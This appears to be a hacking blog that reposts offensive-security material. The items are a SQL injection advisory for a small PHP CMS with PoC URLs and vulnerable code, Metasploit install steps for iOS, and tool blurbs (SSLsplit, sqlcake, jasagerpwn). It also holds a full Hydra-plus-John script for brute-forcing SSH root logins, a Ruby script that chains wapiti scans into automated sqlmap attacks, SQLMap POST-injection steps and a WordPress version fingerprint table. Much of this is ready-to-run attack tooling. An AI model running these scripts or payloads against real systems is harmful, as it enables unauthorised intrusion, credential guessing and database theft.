Simple Web Content Management System SQL Injection

If you want all vulnerability of this post, please go to the Source.

######################################################################################
# Exploit Title: Simple Web Content Management System SQL Injection
# Date: May 30th 2012
# Author: loneferret
# Version: 1.1
# Application Url: http://www.cms-center.com/
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23
######################################################################################
# Discovered by: loneferret
######################################################################################

# Side note:
# This application is nothing fancy, and really shouldn't be used other than
# for practicing SQLi. Pretty much every page has at least one (1) vulnerable
# parameter.

# Vulnerability:
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most of them require to be authenticated with an account (admin).
# But there are a few pages that will cause an error without having to logon.


# PoC 1:
# No Authentication Required.
# Page: /admin/item_delete.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
15      $id = $_GET['id'];
16      $title = NULL;
17      $text = NULL;
18      database_connect();
19      $query = "select title,text from content where id = $id;";
20      //echo $query;
21      $result = mysql_query($query);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.



# PoC 2:
# No Authentication Required.
# Page: /admin/item_status.php?id=[SQLi]&status=1
# Page: /admin/item_status.php?id=1&status=[SQLi]
# Vulnerable Parameter: id & status
# Code:
10    $ref = $_GET['ref'];
11    $id = $_GET['id'];
12    $status = $_GET['status'];
13    $update = "UPDATE content
14            SET status='$status'
15            WHERE id='$id'";
16    $query = mysql_query($update)
        or die("Their was a problem updating the status: ". mysql_error());

# As stated, nothing is checked before passing "id" and/or "status" to MySql.
# This results in a MySql error.

Source: http://www.exploit-id.com/web-applications/simple-web-content-management-system-1-1-multiple-sql-injection

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Metasploit 4 on iPhone 4S & iPad 2

# Install basic tools
apt-get update
apt-get dist-upgrade
apt-get install wget subversion

# Download correct version of ruby and dependencies
wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

# Install them
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

# Delete them
rm -rf *.deb

# Go into /private var and svn checkout the msf trunk.
# Don't download the MSF tar.gz due to svn client versioning issues

cd /private/var
svn co https://www.metasploit.com/svn/framework3/trunk/ msf3
cd msf3/

# Check that Metasploit is running
ruby msfconsole

Source: https://www.offensive-security.com/offsec/metasploit-4-on-iphone-4s-and-ipad-2/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

SSLsplit – transparent and scalable SSL/TLS interception

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.
SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way.

Source: http://www.roe.ch/SSLsplit

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

SQLCake - an automatic sql injection exploitation kit

What is sqlcake?

sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.

sqlcake offers a few useful functions to gather database information easily by sql injection usage.

sqlcake also allows you to bypass magic quotes, dump tables and columns and gives you the possibility to run an interactive MySQL shell.

sqlcake supports union stacked queries for real fast processing and blind injections with logarithmic techniques for saving time.

Source: http://sqlcake.sourceforge.net/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

THC-Hydra password bruteforcing with john the ripper - http://funoverip.net

#!/bin/sh

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20   # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"

if [ "$1" = "" ];then
    echo "Usage: $0 <john session file>"
    exit 0
fi

#for lfile in `ls $loginfiles*`;do

while [ 1 ];do
    # generate some password with john the ripper
    echo; echo "- Start (re)generating passwords with John"
    if [ -e "$john_sessionfile.rec" ];then
        # if session exist, restore it
        $john --restore=$john_sessionfile  > $tmp_passwd &
    else
        # if session not exist yet, create it
        $john $john_all_params --session=$john_sessionfile > $tmp_passwd &
    fi

    # wait 100 seconds, then kill john and start hydra on it
    echo "- Wait ..."
    sleep $john_time_step
    echo "- Kill john"
    killall john 2>/dev/null 1>/dev/null
    sleep 1

    # start hydra
    echo; echo "- Start hydra"; echo

    rm -f $hydra_logfile
    echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
    $hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile

    # if a valid pair has been found, stop the loop
    if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
        echo; echo "FOUND !!"
        grep $hydra_module $hydra_logfile | grep -v DATA
        exit 0
    fi

done

Source: http://funoverip.net/2010/12/thc-hydra-password-bruteforcing-with-john-the-ripper/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

jasagerpwn - Jasager attack vector script for BackTrack 5 and Ubuntu.

This script is going to assume your using BackTrack 4/5 with /pentest/, if you have it somewhere else just adjust the variables accordingly.

This can work with normal ubuntu as well, But keep in mind the setup of the OS will take some more work and general linux skill.

The following dependencies are required for full functionality of the script..

Dependencies: PHP5, Apache2, INSTALLED Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite, DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection. 

Source: https://code.google.com/p/jasagerpwn/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

How to use SQLMap POST Request Injection

If you want to see the original post, please go to the Source. 

1. Browse to target site that have form.
2. You can use any intercept proxy to intercept Request from your web browser like Burp, OWASP Zed, etc.
3. Click the button of the form in that web page.
4. Capture and save the Request into the file. [post.txt]
5. Run SQLMap with option -r to read the post.txt to get the information to attack in that Request, -p for specific parameter to attack.

Source: http://hackertarget.com/sqlmap-post-request-injection/#.T74mX5-I3vY.twitter

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Automating SQLMap with data from wapiti By Brandon Perry

 This version was modified to use in Backtrack 5 R2(ruby1.9.4dev), if you want the original version, please go to the Source.

You must to save this script in wapiti path.

#!/usr/bin/env ruby

#require 'active_support/secure_random'
require 'securerandom'
require 'rexml/document'

wapiti_path = '/pentest/web/wapiti/'
sqlmap_path = '/pentest/database/sqlmap-dev/'

wapiti_report_path = '/tmp/wapiti_report_' + SecureRandom.uuid + '.xml'

remote_host = ARGV[0]

p "Running wapiti..."

system "#{wapiti_path}wapiti.py #{ARGV[0]} -f xml -o #{wapiti_report_path}"

p "Report saved to #{wapiti_report_path}"

p "Parsing results"

results = []

report = ::File.open(wapiti_report_path, "rb")
doc = REXML::Document.new report.read

doc.elements.each('/report/bugTypeList/bugType') do |element|
        bug_type = element.attributes["name"]

        next if bug_type != "SQL Injection"

        p "Parsing " + bug_type

        result = {}
        element.elements.each("bugList/bug") do |bug|
                result[:type] = bug_type
             
                bug.elements.each do |child|
                        if child.name == "url"
                                result[:url] = child.text
                        elsif child.name == "parameter"
                                result[:parameter] = child.text
                        end
                end
                results << result
                result = {}
        end
end

results.each do |result|
        next if result[:type] !~ /SQL Injection/
        p "Running sqlmap"
     
        if result[:url].index(result[:parameter])
                url = result[:url].gsub("%BF%27%22%28", "abcd")
     
                params = result[:url].split("?")[1].split("&")

                skipped_params = []
                params.each do |param|
                        skipped_params << param.split("=")[0] if not param.index("%BF%27%22%28")
                end
                     
                p "Running GET sql injection test on url: " + url
                sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --smart --skip=\"#{skipped_params.join(",")}\" --technique=EUS --flush-session --fresh-queries --level=2 --batch"
                out = `#{sqlmap_command}`
                printf out
        else
                url = result[:url]
                p "Running POST sql injection test on url: " + url
                p "With data: " + result[:parameter]

                parameter = result[:parameter].gsub("%BF%27%22%28", "abcd")

                params = result[:parameter].split("&")

                skipped_params = []
                params.each do |param|
                        skipped_params << param.split("=")[0] if not param.index("%BF%27%22%28")
                end

                sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --data=\"#{parameter}\"  --skip=\"#{skipped_params.join(",")}\" --smart --technique=EUS --flush-session --fresh-queries --level=2 --batch"
                p sqlmap_command
                sqlmap_output = `#{sqlmap_command}`
             
                printf sqlmap_output
        end
end

Source:  http://volatile-minds.blogspot.com/2012/05/automating-sqlmap-with-data-from-wapiti.html/

 
If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Wordpress version finder

If you request domain.com/wp-login.php you will get this in the HTML response:

<link rel=’stylesheet’ id=’colors-fresh-css’ href=’ $ DOMAIN/wp-admin/css/colors-fresh.css?ver= $VERSION ‘ type=’text/css’ media=’all’ />

(or in older versions)

<link rel=’stylesheet’ id=’login-css’ href=’$DOMAIN/wp-admin/css/login.css?ver=$VERSION’ type=’text/css’ media=’all’ />

Each $VERSION relates to a different wordpress version.

With the help of core.svn.wordpress.org/tags/2.7/wp-includes/script-loader.php
(2.8/wp-includes/script-loader.php.. etc) i made a list

WP-version $colors_version
2.7   20081210
2.7.1 20081210
2.8   20090610
2.8.1 20090625
2.8.2 20090625
2.8.3 20090625
2.8.4 20090625
2.8.5 20090625
2.8.6 20090625
2.9   20091217
2.9.1 20091217
2.9.2 20091217
3.0   20100610
3.0.1 20100610
3.0.2 20100610
3.0.3 20100610
3.0.4 20100610
3.0.5 20100610
3.0.6 20100610
3.1   20110121
3.1.1 20110121
3.1.2 20110121
3.1.3 20110121
3.1.4 20110121
3.2   20110703
3.2.1 20110703
3.3   20111206
3.3.1 20111206

This can be brought down to:

2.7   20081210
2.7.x 20081210
2.8   20090610
2.8.x 20090625
2.9   20091217
2.9.x 20091217
3.0   20100610
3.0.x 20100610
3.1   20110121
3.1.x 20110121
3.2   20110703
3.2.x 20110703
3.3   20111206
3.3.x 20111206 

Source: http://0xa.li/wordpress-version-finder/ 

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

PDF Examiner

View PDF objects as hex/text, PDF dissector and inspector, scan for known exploits (CVE-2007-5659, CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2009-3954, CVE-2009-3953, CVE-2009-3959, CVE-2009-1493, CVE-2010-0188, CVE-2010-1297, CVE-2010-2883, CVE-2010-3654, CVE-2010-4091, CVE-2011-0609, CVE-2011-0611, CVE-2011-2462, CVE-2011-4369 and embedded /Action commands), process PDF compression (FlateDecode, ASCIIHexDecode, LZWDecode, ASCII85Decode, RunLengthDecode, CCITTFaxDecode Group 3 1D), encryption (40+128 bit RC4, 128 bit AESV2, 256 bit AESV3), and obfuscation (unicode, Hex, fromCharCode). Browse objects. More Info. 

Source: https://www.malwaretracker.com/pdf.php

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00